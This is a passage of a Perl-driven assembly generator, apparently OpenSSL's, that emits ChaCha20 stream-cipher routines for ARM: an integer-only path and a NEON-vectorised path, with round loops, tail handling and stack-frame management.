#if defined(__thumb2__) || defined(__clang__)
.syntax unified
#endif
#if defined(__thumb2__)
.thumb
#else
.code 32
#endif
#if defined(__thumb2__) || defined(__clang__)
#define ldrhsb ldrbhs
#endif
.align 5
.Lsigma:
.long 0x61707865,0x3320646e,0x79622d32,0x6b206574 @ endian-neutral
.Lone:
.long 1,0,0,0
#if __ARM_MAX_ARCH__>=7
.LOPENSSL_armcap:
.word OPENSSL_armcap_P-.LChaCha20_ctr32
#else
.word -1
#endif
.globl ChaCha20_ctr32
.type ChaCha20_ctr32,%function
.align 5
ChaCha20_ctr32:
.LChaCha20_ctr32:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0-r2,r4-r11,lr}
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r14,pc,#16 @ ChaCha20_ctr32
#else
adr r14,.LChaCha20_ctr32
#endif
cmp r2,#0 @ len==0?
#ifdef __thumb2__
itt eq
#endif
addeq sp,sp,#4*3
beq .Lno_data
#if __ARM_MAX_ARCH__>=7
cmp r2,#192 @ test len
bls .Lshort
ldr r4,[r14,#-32]
ldr r4,[r14,r4]
# ifdef __APPLE__
ldr r4,[r4]
# endif
tst r4,#ARMV7_NEON
bne .LChaCha20_neon
.Lshort:
#endif
ldmia r12,{r4-r7} @ load counter and nonce
sub sp,sp,#4*(16) @ off-load area
sub r14,r14,#64 @ .Lsigma
stmdb sp!,{r4-r7} @ copy counter and nonce
ldmia r3,{r4-r11} @ load key
ldmia r14,{r0-r3} @ load sigma
stmdb sp!,{r4-r11} @ copy key
stmdb sp!,{r0-r3} @ copy sigma
str r10,[sp,#4*(16+10)] @ off-load "@x[10]"
str r11,[sp,#4*(16+11)] @ off-load "@x[11]"
b .Loop_outer_enter
.align 4
.Loop_outer:
ldmia sp,{r0-r9} @ load key material
str @t[3],[sp,#4*(32+2)] @ save len
str r12, [sp,#4*(32+1)] @ save inp
str r14, [sp,#4*(32+0)] @ save out
.Loop_outer_enter:
ldr @t[3], [sp,#4*(15)]
ldr @x[12],[sp,#4*(12)] @ modulo-scheduled load
ldr @t[2], [sp,#4*(13)]
ldr @x[14],[sp,#4*(14)]
str @t[3], [sp,#4*(16+15)]
mov @t[3],#10
b .Loop
.align 4
.Loop:
subs @t[3],@t[3],#1
___
foreach (&ROUND(0, 4, 8,12)) { eval; }
foreach (&ROUND(0, 5,10,15)) { eval; }
$code.=<<___;
bne .Loop
ldr @t[3],[sp,#4*(32+2)] @ load len
str @t[0], [sp,#4*(16+8)] @ modulo-scheduled store
str @t[1], [sp,#4*(16+9)]
str @x[12],[sp,#4*(16+12)]
str @t[2], [sp,#4*(16+13)]
str @x[14],[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ @x[0-7] and second half at sp+4*(16+8)
cmp @t[3],#64 @ done yet?
#ifdef __thumb2__
itete lo
#endif
addlo r12,sp,#4*(0) @ shortcut or ...
ldrhs r12,[sp,#4*(32+1)] @ ... load inp
addlo r14,sp,#4*(0) @ shortcut or ...
ldrhs r14,[sp,#4*(32+0)] @ ... load out
ldr @t[0],[sp,#4*(0)] @ load key material
ldr @t[1],[sp,#4*(1)]
#if __ARM_ARCH__>=6 || !defined(__ARMEB__)
# if __ARM_ARCH__<7
orr @t[2],r12,r14
tst @t[2],#3 @ are input and output aligned?
ldr @t[2],[sp,#4*(2)]
bne .Lunaligned
cmp @t[3],#64 @ restore flags
# else
ldr @t[2],[sp,#4*(2)]
# endif
ldr @t[3],[sp,#4*(3)]
add @x[0],@x[0],@t[0] @ accumulate key material
add @x[1],@x[1],@t[1]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[0],@x[0],@t[0] @ xor with input
eorhs @x[1],@x[1],@t[1]
add @t[0],sp,#4*(4)
str @x[0],[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs @x[2],@x[2],@t[2]
eorhs @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[1],[r14,#-12]
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
add @x[5],@x[5],@t[1]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[4],@x[4],@t[0]
eorhs @x[5],@x[5],@t[1]
add @t[0],sp,#4*(8)
str @x[4],[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs @x[6],@x[6],@t[2]
eorhs @x[7],@x[7],@t[3]
str @x[5],[r14,#-12]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[6],[r14,#-8]
add @x[0],sp,#4*(16+8)
str @x[7],[r14,#-4]
ldmia @x[0],{@x[0]-@x[7]} @ load second half
add @x[0],@x[0],@t[0] @ accumulate key material
add @x[1],@x[1],@t[1]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
# ifdef __thumb2__
itt hi
# endif
strhi @t[2],[sp,#4*(16+10)] @ copy "@x[10]" while at it
strhi @t[3],[sp,#4*(16+11)] @ copy "@x[11]" while at it
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[0],@x[0],@t[0]
eorhs @x[1],@x[1],@t[1]
add @t[0],sp,#4*(12)
str @x[0],[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs @x[2],@x[2],@t[2]
eorhs @x[3],@x[3],@t[3]
str @x[1],[r14,#-12]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
add @x[5],@x[5],@t[1]
# ifdef __thumb2__
itt hi
# endif
addhi @t[0],@t[0],#1 @ next counter value
strhi @t[0],[sp,#4*(12)] @ save next counter value
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[4],@x[4],@t[0]
eorhs @x[5],@x[5],@t[1]
# ifdef __thumb2__
it ne
# endif
ldrne @t[0],[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
itt hs
# endif
eorhs @x[6],@x[6],@t[2]
eorhs @x[7],@x[7],@t[3]
str @x[4],[r14],#16 @ store output
str @x[5],[r14,#-12]
# ifdef __thumb2__
it hs
# endif
subhs @t[3],@t[0],#64 @ len-=64
str @x[6],[r14,#-8]
str @x[7],[r14,#-4]
bhi .Loop_outer
beq .Ldone
# if __ARM_ARCH__<7
b .Ltail
.align 4
.Lunaligned: @ unaligned endian-neutral path
cmp @t[3],#64 @ restore flags
# endif
#endif
#if __ARM_ARCH__<7
ldr @t[3],[sp,#4*(3)]
___
for ($i=0;$i<16;$i+=4) {
my $j=$i&0x7;
$code.=<<___ if ($i==4);
add @x[0],sp,#4*(16+8)
___
$code.=<<___ if ($i==8);
ldmia @x[0],{@x[0]-@x[7]} @ load second half
# ifdef __thumb2__
itt hi
# endif
strhi @t[2],[sp,#4*(16+10)] @ copy "@x[10]"
strhi @t[3],[sp,#4*(16+11)] @ copy "@x[11]"
___
$code.=<<___;
add @x[$j+0],@x[$j+0],@t[0] @ accumulate key material
___
$code.=<<___ if ($i==12);
# ifdef __thumb2__
itt hi
# endif
addhi @t[0],@t[0],#1 @ next counter value
strhi @t[0],[sp,#4*(12)] @ save next counter value
___
$code.=<<___;
add @x[$j+1],@x[$j+1],@t[1]
add @x[$j+2],@x[$j+2],@t[2]
# ifdef __thumb2__
itete lo
# endif
eorlo @t[0],@t[0],@t[0] @ zero or ...
ldrhsb @t[0],[r12],#16 @ ... load input
eorlo @t[1],@t[1],@t[1]
ldrhsb @t[1],[r12,#-12]
add @x[$j+3],@x[$j+3],@t[3]
# ifdef __thumb2__
itete lo
# endif
eorlo @t[2],@t[2],@t[2]
ldrhsb @t[2],[r12,#-8]
eorlo @t[3],@t[3],@t[3]
ldrhsb @t[3],[r12,#-4]
eor @x[$j+0],@t[0],@x[$j+0] @ xor with input (or zero)
eor @x[$j+1],@t[1],@x[$j+1]
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[0],[r12,#-15] @ load more input
ldrhsb @t[1],[r12,#-11]
eor @x[$j+2],@t[2],@x[$j+2]
strb @x[$j+0],[r14],#16 @ store output
eor @x[$j+3],@t[3],@x[$j+3]
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[2],[r12,#-7]
ldrhsb @t[3],[r12,#-3]
strb @x[$j+1],[r14,#-12]
eor @x[$j+0],@t[0],@x[$j+0],lsr#8
strb @x[$j+2],[r14,#-8]
eor @x[$j+1],@t[1],@x[$j+1],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[0],[r12,#-14] @ load more input
ldrhsb @t[1],[r12,#-10]
strb @x[$j+3],[r14,#-4]
eor @x[$j+2],@t[2],@x[$j+2],lsr#8
strb @x[$j+0],[r14,#-15]
eor @x[$j+3],@t[3],@x[$j+3],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[2],[r12,#-6]
ldrhsb @t[3],[r12,#-2]
strb @x[$j+1],[r14,#-11]
eor @x[$j+0],@t[0],@x[$j+0],lsr#8
strb @x[$j+2],[r14,#-7]
eor @x[$j+1],@t[1],@x[$j+1],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[0],[r12,#-13] @ load more input
ldrhsb @t[1],[r12,#-9]
strb @x[$j+3],[r14,#-3]
eor @x[$j+2],@t[2],@x[$j+2],lsr#8
strb @x[$j+0],[r14,#-14]
eor @x[$j+3],@t[3],@x[$j+3],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[2],[r12,#-5]
ldrhsb @t[3],[r12,#-1]
strb @x[$j+1],[r14,#-10]
strb @x[$j+2],[r14,#-6]
eor @x[$j+0],@t[0],@x[$j+0],lsr#8
strb @x[$j+3],[r14,#-2]
eor @x[$j+1],@t[1],@x[$j+1],lsr#8
strb @x[$j+0],[r14,#-13]
eor @x[$j+2],@t[2],@x[$j+2],lsr#8
strb @x[$j+1],[r14,#-9]
eor @x[$j+3],@t[3],@x[$j+3],lsr#8
strb @x[$j+2],[r14,#-5]
strb @x[$j+3],[r14,#-1]
___
$code.=<<___ if ($i<12);
add @t[0],sp,#4*(4+$i)
ldmia @t[0],{@t[0]-@t[3]} @ load key material
___
}
$code.=<<___;
# ifdef __thumb2__
it ne
# endif
ldrne @t[0],[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
it hs
# endif
subhs @t[3],@t[0],#64 @ len-=64
bhi .Loop_outer
beq .Ldone
#endif
.Ltail:
ldr r12,[sp,#4*(32+1)] @ load inp
add @t[1],sp,#4*(0)
ldr r14,[sp,#4*(32+0)] @ load out
.Loop_tail:
ldrb @t[2],[@t[1]],#1 @ read buffer on stack
ldrb @t[3],[r12],#1 @ read input
subs @t[0],@t[0],#1
eor @t[3],@t[3],@t[2]
strb @t[3],[r14],#1 @ store output
bne .Loop_tail
.Ldone:
add sp,sp,#4*(32+3)
.Lno_data:
ldmia sp!,{r4-r11,pc}
.size ChaCha20_ctr32,.-ChaCha20_ctr32
___
{{{
my ($a0,$b0,$c0,$d0,$a1,$b1,$c1,$d1,$a2,$b2,$c2,$d2,$t0,$t1,$t2,$t3) =
map("q$_",(0..15));
sub NEONROUND {
my $odd = pop;
my ($a,$b,$c,$d,$t)=@_;
(
"&vadd_i32 ($a,$a,$b)",
"&veor ($d,$d,$a)",
"&vrev32_16 ($d,$d)", # vrot ($d,16)
"&vadd_i32 ($c,$c,$d)",
"&veor ($t,$b,$c)",
"&vshr_u32 ($b,$t,20)",
"&vsli_32 ($b,$t,12)",
"&vadd_i32 ($a,$a,$b)",
"&veor ($t,$d,$a)",
"&vshr_u32 ($d,$t,24)",
"&vsli_32 ($d,$t,8)",
"&vadd_i32 ($c,$c,$d)",
"&veor ($t,$b,$c)",
"&vshr_u32 ($b,$t,25)",
"&vsli_32 ($b,$t,7)",
"&vext_8 ($c,$c,$c,8)",
"&vext_8 ($b,$b,$b,$odd?12:4)",
"&vext_8 ($d,$d,$d,$odd?4:12)"
);
}
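# A note on the encoding above (a reading of the code, not upstream
# commentary): each rotation is synthesized from a shift pair, e.g.
# vshr_u32(b,t,20) followed by vsli_32(b,t,12) yields rotl32(t,12);
# vrev32_16 is the 16-bit rotation; and the trailing vext_8 ops
# re-diagonalize the state between even and odd rounds.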
$code.=<<___;
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.type ChaCha20_neon,%function
.align 5
ChaCha20_neon:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0-r2,r4-r11,lr}
.LChaCha20_neon:
adr r14,.Lsigma
vstmdb sp!,{d8-d15} @ ABI spec says so
stmdb sp!,{r0-r3}
vld1.32 {$b0-$c0},[r3] @ load key
ldmia r3,{r4-r11} @ load key
sub sp,sp,#4*(16+16)
vld1.32 {$d0},[r12] @ load counter and nonce
add r12,sp,#4*8
ldmia r14,{r0-r3} @ load sigma
vld1.32 {$a0},[r14]! @ load sigma
vld1.32 {$t0},[r14] @ one
vst1.32 {$c0-$d0},[r12] @ copy 1/2key|counter|nonce
vst1.32 {$a0-$b0},[sp] @ copy sigma|1/2key
str r10,[sp,#4*(16+10)] @ off-load "@x[10]"
str r11,[sp,#4*(16+11)] @ off-load "@x[11]"
vshl.i32 $t1#lo,$t0#lo,#1 @ two
vstr $t0#lo,[sp,#4*(16+0)]
vshl.i32 $t2#lo,$t0#lo,#2 @ four
vstr $t1#lo,[sp,#4*(16+2)]
vmov $a1,$a0
vstr $t2#lo,[sp,#4*(16+4)]
vmov $a2,$a0
vmov $b1,$b0
vmov $b2,$b0
b .Loop_neon_enter
.align 4
.Loop_neon_outer:
ldmia sp,{r0-r9} @ load key material
cmp @t[3],#64*2 @ if len<=64*2
bls .Lbreak_neon @ switch to integer-only
vmov $a1,$a0
str @t[3],[sp,#4*(32+2)] @ save len
vmov $a2,$a0
str r12, [sp,#4*(32+1)] @ save inp
vmov $b1,$b0
str r14, [sp,#4*(32+0)] @ save out
vmov $b2,$b0
.Loop_neon_enter:
ldr @t[3], [sp,#4*(15)]
vadd.i32 $d1,$d0,$t0 @ counter+1
ldr @x[12],[sp,#4*(12)] @ modulo-scheduled load
vmov $c1,$c0
ldr @t[2], [sp,#4*(13)]
vmov $c2,$c0
ldr @x[14],[sp,#4*(14)]
vadd.i32 $d2,$d1,$t0 @ counter+2
str @t[3], [sp,#4*(16+15)]
mov @t[3],#10
add @x[12],@x[12],#3 @ counter+3
b .Loop_neon
.align 4
.Loop_neon:
subs @t[3],@t[3],#1
___
my @thread0=&NEONROUND($a0,$b0,$c0,$d0,$t0,0);
my @thread1=&NEONROUND($a1,$b1,$c1,$d1,$t1,0);
my @thread2=&NEONROUND($a2,$b2,$c2,$d2,$t2,0);
my @thread3=&ROUND(0,4,8,12);
foreach (@thread0) {
eval; eval(shift(@thread3));
eval(shift(@thread1)); eval(shift(@thread3));
eval(shift(@thread2)); eval(shift(@thread3));
}
@thread0=&NEONROUND($a0,$b0,$c0,$d0,$t0,1);
@thread1=&NEONROUND($a1,$b1,$c1,$d1,$t1,1);
@thread2=&NEONROUND($a2,$b2,$c2,$d2,$t2,1);
@thread3=&ROUND(0,5,10,15);
foreach (@thread0) {
eval; eval(shift(@thread3));
eval(shift(@thread1)); eval(shift(@thread3));
eval(shift(@thread2)); eval(shift(@thread3));
}
$code.=<<___;
bne .Loop_neon
add @t[3],sp,#32
vld1.32 {$t0-$t1},[sp] @ load key material
vld1.32 {$t2-$t3},[@t[3]]
ldr @t[3],[sp,#4*(32+2)] @ load len
str @t[0], [sp,#4*(16+8)] @ modulo-scheduled store
str @t[1], [sp,#4*(16+9)]
str @x[12],[sp,#4*(16+12)]
str @t[2], [sp,#4*(16+13)]
str @x[14],[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ @x[0-7] and second half at sp+4*(16+8)
ldr r12,[sp,#4*(32+1)] @ load inp
ldr r14,[sp,#4*(32+0)] @ load out
vadd.i32 $a0,$a0,$t0 @ accumulate key material
vadd.i32 $a1,$a1,$t0
vadd.i32 $a2,$a2,$t0
vldr $t0#lo,[sp,#4*(16+0)] @ one
vadd.i32 $b0,$b0,$t1
vadd.i32 $b1,$b1,$t1
vadd.i32 $b2,$b2,$t1
vldr $t1#lo,[sp,#4*(16+2)] @ two
vadd.i32 $c0,$c0,$t2
vadd.i32 $c1,$c1,$t2
vadd.i32 $c2,$c2,$t2
vadd.i32 $d1#lo,$d1#lo,$t0#lo @ counter+1
vadd.i32 $d2#lo,$d2#lo,$t1#lo @ counter+2
vadd.i32 $d0,$d0,$t3
vadd.i32 $d1,$d1,$t3
vadd.i32 $d2,$d2,$t3
cmp @t[3],#64*4
blo .Ltail_neon
vld1.8 {$t0-$t1},[r12]! @ load input
mov @t[3],sp
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0 @ xor with input
veor $b0,$b0,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a1,$a1,$t0
vst1.8 {$a0-$b0},[r14]! @ store output
veor $b1,$b1,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c1,$c1,$t2
vst1.8 {$c0-$d0},[r14]!
veor $d1,$d1,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a2,$a2,$t0
vld1.32 {$a0-$b0},[@t[3]]! @ load for next iteration
veor $t0#hi,$t0#hi,$t0#hi
vldr $t0#lo,[sp,#4*(16+4)] @ four
veor $b2,$b2,$t1
vld1.32 {$c0-$d0},[@t[3]]
veor $c2,$c2,$t2
vst1.8 {$a1-$b1},[r14]!
veor $d2,$d2,$t3
vst1.8 {$c1-$d1},[r14]!
vadd.i32 $d0#lo,$d0#lo,$t0#lo @ next counter value
vldr $t0#lo,[sp,#4*(16+0)] @ one
ldmia sp,{@t[0]-@t[3]} @ load key material
add @x[0],@x[0],@t[0] @ accumulate key material
ldr @t[0],[r12],#16 @ load input
vst1.8 {$a2-$b2},[r14]!
add @x[1],@x[1],@t[1]
ldr @t[1],[r12,#-12]
vst1.8 {$c2-$d2},[r14]!
add @x[2],@x[2],@t[2]
ldr @t[2],[r12,#-8]
add @x[3],@x[3],@t[3]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
eor @x[0],@x[0],@t[0] @ xor with input
add @t[0],sp,#4*(4)
eor @x[1],@x[1],@t[1]
str @x[0],[r14],#16 @ store output
eor @x[2],@x[2],@t[2]
str @x[1],[r14,#-12]
eor @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
ldr @t[0],[r12],#16 @ load input
add @x[5],@x[5],@t[1]
ldr @t[1],[r12,#-12]
add @x[6],@x[6],@t[2]
ldr @t[2],[r12,#-8]
add @x[7],@x[7],@t[3]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
eor @x[4],@x[4],@t[0]
add @t[0],sp,#4*(8)
eor @x[5],@x[5],@t[1]
str @x[4],[r14],#16 @ store output
eor @x[6],@x[6],@t[2]
str @x[5],[r14,#-12]
eor @x[7],@x[7],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[6],[r14,#-8]
add @x[0],sp,#4*(16+8)
str @x[7],[r14,#-4]
ldmia @x[0],{@x[0]-@x[7]} @ load second half
add @x[0],@x[0],@t[0] @ accumulate key material
ldr @t[0],[r12],#16 @ load input
add @x[1],@x[1],@t[1]
ldr @t[1],[r12,#-12]
# ifdef __thumb2__
it hi
# endif
strhi @t[2],[sp,#4*(16+10)] @ copy "@x[10]" while at it
add @x[2],@x[2],@t[2]
ldr @t[2],[r12,#-8]
# ifdef __thumb2__
it hi
# endif
strhi @t[3],[sp,#4*(16+11)] @ copy "@x[11]" while at it
add @x[3],@x[3],@t[3]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
eor @x[0],@x[0],@t[0]
add @t[0],sp,#4*(12)
eor @x[1],@x[1],@t[1]
str @x[0],[r14],#16 @ store output
eor @x[2],@x[2],@t[2]
str @x[1],[r14,#-12]
eor @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
add @t[0],@t[0],#4 @ next counter value
add @x[5],@x[5],@t[1]
str @t[0],[sp,#4*(12)] @ save next counter value
ldr @t[0],[r12],#16 @ load input
add @x[6],@x[6],@t[2]
add @x[4],@x[4],#3 @ counter+3
ldr @t[1],[r12,#-12]
add @x[7],@x[7],@t[3]
ldr @t[2],[r12,#-8]
ldr @t[3],[r12,#-4]
# ifdef __ARMEB__
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
eor @x[4],@x[4],@t[0]
# ifdef __thumb2__
it hi
# endif
ldrhi @t[0],[sp,#4*(32+2)] @ re-load len
eor @x[5],@x[5],@t[1]
eor @x[6],@x[6],@t[2]
str @x[4],[r14],#16 @ store output
eor @x[7],@x[7],@t[3]
str @x[5],[r14,#-12]
sub @t[3],@t[0],#64*4 @ len-=64*4
str @x[6],[r14,#-8]
str @x[7],[r14,#-4]
bhi .Loop_neon_outer
b .Ldone_neon
.align 4
.Lbreak_neon:
@ harmonize NEON and integer-only stack frames: load data
@ from NEON frame, but save to integer-only one; distance
@ between the two is 4*(32+4+16-32)=4*(20).
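@ (A sanity check of that figure from the prologues above: the NEON
@ frame holds 4*(16+16) bytes of state plus 4*4 for {r0-r3} plus 8*8
@ for d8-d15 = 4*52 below the saved registers, while the integer-only
@ frame holds 4*32, and 4*52-4*32 = 4*20 -- an observation, not
@ upstream commentary.)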
str @t[3], [sp,#4*(20+32+2)] @ save len
add @t[3],sp,#4*(32+4)
str r12, [sp,#4*(20+32+1)] @ save inp
str r14, [sp,#4*(20+32+0)] @ save out
ldr @x[12],[sp,#4*(16+10)]
ldr @x[14],[sp,#4*(16+11)]
vldmia @t[3],{d8-d15} @ fulfill ABI requirement
str @x[12],[sp,#4*(20+16+10)] @ copy "@x[10]"
str @x[14],[sp,#4*(20+16+11)] @ copy "@x[11]"
ldr @t[3], [sp,#4*(15)]
ldr @x[12],[sp,#4*(12)] @ modulo-scheduled load
ldr @t[2], [sp,#4*(13)]
ldr @x[14],[sp,#4*(14)]
str @t[3], [sp,#4*(20+16+15)]
add @t[3],sp,#4*(20)
vst1.32 {$a0-$b0},[@t[3]]! @ copy key
add sp,sp,#4*(20) @ switch frame
vst1.32 {$c0-$d0},[@t[3]]
mov @t[3],#10
b .Loop @ go integer-only
.align 4
.Ltail_neon:
cmp @t[3],#64*3
bhs .L192_or_more_neon
cmp @t[3],#64*2
bhs .L128_or_more_neon
cmp @t[3],#64*1
bhs .L64_or_more_neon
add @t[0],sp,#4*(8)
vst1.8 {$a0-$b0},[sp]
add @t[2],sp,#4*(0)
vst1.8 {$c0-$d0},[@t[0]]
b .Loop_tail_neon
.align 4
.L64_or_more_neon:
vld1.8 {$t0-$t1},[r12]!
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0
veor $b0,$b0,$t1
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vst1.8 {$a0-$b0},[r14]!
vst1.8 {$c0-$d0},[r14]!
beq .Ldone_neon
add @t[0],sp,#4*(8)
vst1.8 {$a1-$b1},[sp]
add @t[2],sp,#4*(0)
vst1.8 {$c1-$d1},[@t[0]]
sub @t[3],@t[3],#64*1 @ len-=64*1
b .Loop_tail_neon
.align 4
.L128_or_more_neon:
vld1.8 {$t0-$t1},[r12]!
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0
veor $b0,$b0,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a1,$a1,$t0
veor $b1,$b1,$t1
vst1.8 {$a0-$b0},[r14]!
veor $c1,$c1,$t2
vst1.8 {$c0-$d0},[r14]!
veor $d1,$d1,$t3
vst1.8 {$a1-$b1},[r14]!
vst1.8 {$c1-$d1},[r14]!
beq .Ldone_neon
add @t[0],sp,#4*(8)
vst1.8 {$a2-$b2},[sp]
add @t[2],sp,#4*(0)
vst1.8 {$c2-$d2},[@t[0]]
sub @t[3],@t[3],#64*2 @ len-=64*2
b .Loop_tail_neon
.align 4
.L192_or_more_neon:
vld1.8 {$t0-$t1},[r12]!
vld1.8 {$t2-$t3},[r12]!
veor $a0,$a0,$t0
veor $b0,$b0,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c0,$c0,$t2
veor $d0,$d0,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a1,$a1,$t0
veor $b1,$b1,$t1
vld1.8 {$t0-$t1},[r12]!
veor $c1,$c1,$t2
vst1.8 {$a0-$b0},[r14]!
veor $d1,$d1,$t3
vld1.8 {$t2-$t3},[r12]!
veor $a2,$a2,$t0
vst1.8 {$c0-$d0},[r14]!
veor $b2,$b2,$t1
vst1.8 {$a1-$b1},[r14]!
veor $c2,$c2,$t2
vst1.8 {$c1-$d1},[r14]!
veor $d2,$d2,$t3
vst1.8 {$a2-$b2},[r14]!
vst1.8 {$c2-$d2},[r14]!
beq .Ldone_neon
ldmia sp,{@t[0]-@t[3]} @ load key material
add @x[0],@x[0],@t[0] @ accumulate key material
add @t[0],sp,#4*(4)
add @x[1],@x[1],@t[1]
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
add @x[4],@x[4],@t[0] @ accumulate key material
add @t[0],sp,#4*(8)
add @x[5],@x[5],@t[1]
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
stmia sp,{@x[0]-@x[7]}
add @x[0],sp,#4*(16+8)
ldmia @x[0],{@x[0]-@x[7]} @ load second half
add @x[0],@x[0],@t[0] @ accumulate key material
add @t[0],sp,#4*(12)
add @x[1],@x[1],@t[1]
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
add @x[4],@x[4],@t[0] @ accumulate key material
add @t[0],sp,#4*(8)
add @x[5],@x[5],@t[1]
add @x[4],@x[4],#3 @ counter+3
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
ldr @t[3],[sp,#4*(32+2)] @ re-load len
# ifdef __ARMEB__
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
stmia @t[0],{@x[0]-@x[7]}
add @t[2],sp,#4*(0)
sub @t[3],@t[3],#64*3 @ len-=64*3
.Loop_tail_neon:
ldrb @t[0],[@t[2]],#1 @ read buffer on stack
ldrb @t[1],[r12],#1 @ read input
subs @t[3],@t[3],#1
eor @t[0],@t[0],@t[1]
strb @t[0],[r14],#1 @ store output
bne .Loop_tail_neon
.Ldone_neon:
add sp,sp,#4*(32+4)
vldmia sp,{d8-d15}
add sp,sp,#4*(16+3)
ldmia sp!,{r4-r11,pc}
.size ChaCha20_neon,.-ChaCha20_neon
.comm OPENSSL_armcap_P,4,4
#endif
___
}}}
foreach (split("\n",$code)) {
